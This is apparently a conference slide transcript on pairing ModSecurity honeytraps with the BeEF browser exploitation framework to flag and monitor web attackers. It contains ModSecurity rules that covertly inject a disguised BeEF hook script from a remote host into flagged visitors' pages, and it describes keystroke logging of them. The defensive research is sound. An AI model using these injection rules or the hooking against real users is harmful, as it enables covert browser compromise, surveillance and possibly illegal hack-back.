Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Building a Web Attacker Dashboard with ModSecur...

rcbarnett
October 25, 2012

Building a Web Attacker Dashboard with ModSecurity and BeEF

This talk demonstrates a PoC example of using ModSecurity to set HoneyTraps and hook malicious users with BeEF.

rcbarnett

October 25, 2012
Tweet

More Decks by rcbarnett

Other Decks in Technology

Transcript

  1. © 2012 Presented by: Building a Web Attacker Dashboard with

    ModSecurity and BeEF Ryan Barnett Lead Security Researcher Trustwave SpiderLabs [email protected] @ryancbarnett
  2. © 2012 Speaker Info: Ryan Barnett •  Trustwave SpiderLabs Research

    –  Specialize in Web Application Defense/WAF Research •  WebDefend (Commercial) •  ModSecurity (Open Source) •  OWASP –  Lead the ModSecurity Core Rule Set (CRS) Project –  Contributor for AppSensor Project •  Author –  The Web Application Defender’s Cookbook (Wiley, Dec. 2012)
  3. © 2012 Agenda Breakdown •  OWASP Web Application Security Risks

    •  Situational Awareness –  Attacks –  Threats –  Tracking Threat Agents •  Building a Web Attacker Dashboard –  ModSecurity WAF –  BeEF –  Audit Console •  Example Usage •  Closing
  4. © 2012 Common Attack Methodology •  ModSecurity SQL Injection Challenge

    •  Automation to identify injection points –  NetSparker –  Arachni –  Sqlmap –  Havij •  Manual testing in a web browser to develop working SQLi payloads –  An iterative process of trial and error 1.  Send initial payloads and observe DB responses 2.  Use obfuscation tactics (comments, encodings, etc…) 3.  Send payload and observe DB response 4.  Repeat steps 2 - 3
  5. © 2012 Threat Agent Tracking: BeEF Tagging •  BeEF –

    The Browser Exploit Framework •  Penetration testing tool that focuses on the web browser •  Mainly used to demonstrate how internal web clients can become compromised •  Written in Ruby •  Lead Developer is Michele Orru (Trustwave SpiderLabs) –  Exploiting Internal Network Vulns via the Browser using BeEF Bind –  Thursday October 25, 2012 3:00pm - 3:45pm –  NTObjectives Room - Texas Ballroom II http://beefproject.com/
  6. © 2012 Dashboard Components •  ModSecurity WAF –  Monitors for

    attacks –  Initiates BeEF Hooking •  BeEF –  Hooks malicious users –  Enumerates attacker’s location –  Monitors activities •  Audit Console –  Collects audit logs from ModSecurity –  Shares data with BeEF UI
  7. © 2012 Update BeEF for Attacker Dashboard Usage •  Obscure

    the tell-tail signs of BeEF hook in config.yaml file –  From - hook_file: "/hook.js" –  To - hook_file: "/img-min.js" •  Modify the UI Text –  From – "Online Browsers" –  To – "Online Attackers"
  8. © 2012 Setting HoneyTraps •  ModSecurity can modify HTTP response

    data going to clients –  SecContentInjection Directive –  SecStreamOutBodyInspection Directive –  @rsub operator –  STREAM_OUTPUT_BODY variable –  Prepend/Append actions •  Use these capabilities to transparently add HoneyTrap data to applications
  9. © 2012 HoneyTrap Examples •  Fake robots.txt Disallow entries – 

    Disallow: /scripts.old •  Fake HTML comments –  <!-- old file is located at login.bak --> •  Fake Cookies –  Set-Cookie: user_role=1; expires=Tue, 11-Mar-2014 18:28:03 GMT; path=/; domain=.yoursite.com •  Fake Hidden Form Field –  <input type="hidden" name="debug" value="false">
  10. © 2012 Fake Hidden Form Field Example SecRule STREAM_OUTPUT_BODY \

    "@rsub s/<\/form>/<input type=\"hidden \" name=\"admin\" value=\"false\"><\/ form>/id" \ "id:'999009',phase4,t:none,nolog,pass"
  11. © 2012 Fake Parameter Data Sent POST /wordpress/wp-login.php HTTP/1.1 Host:

    192.168.168.128 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv: 16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.168.128/wordpress/wp-login.php Cookie: PHPSESSID=39sg9cjq940h3bo9b0jmce2137; acopendivids=phpbb2,redmine; acgroupswithpersist=nada Content-Type: application/x-www-form-urlencoded Content-Length: 78 log=bsmith&pwd=paswword&submit=Login+%C2%BB&redirect_to=wp- admin%2F&admin=true
  12. © 2012 Initiate BeEF Hooking SecRule ARGS:admin "!@streq false" "id:'999010',phase:

    2,t:none,log,block,msg:'HoneyTrap Alert: Fake HIDDEN Form Data Manipulated.',setvar:tx.malicious_client=1" SecRule TX:MALICIOUS_CLIENT "@eq 1" "chain,id:'999224',phase:4,t:none,pass,log, msg:'Hooking Client with BeEF due to HoneyTrap Violation.'" SecRule STREAM_OUTPUT_BODY "@rsub s/<\/ html>/<script src=\"http:\/\/ 192.168.1.109:3000\/img-min.js\"><\/script>< \/html>/"
  13. © 2012 Caution •  BeEF is extremely powerful •  The

    use of many of its modules may violate hacking laws •  Consult your legal department before use
  14. © 2012 Focusing on Monitoring Capabilities •  Web Fraud Detection

    vendors do this today –  Inject code for client device fingerprinting –  Inspecting the browser/ system for malicious code •  We are focusing on enumerating information about the attacker –  Geo Location –  Network information –  Keystroke logging
  15. © 2012 ModSecurity Audit Console Integration •  Beef_dir/extensions/modsecurity/config.yaml beef: extension:

    modsecurity: enable: true name: 'ModSecurity' authors: ["antisnatchor"] auditconsole: ip: "console.yoursite.com" port: "443" ssl: true user: "defender" passwd: "secretpassword"
  16. © 2012 Closing •  Feedback/Questions? •  Email –  [email protected] – 

    [email protected] •  Twitter –  @ryancbarnett –  @ModSecurity •  OWASP Open Source Showcase - ModSecurity –  Friday October 26, 2012 2:00pm - 5:00pm –  Foothills I (17th Floor)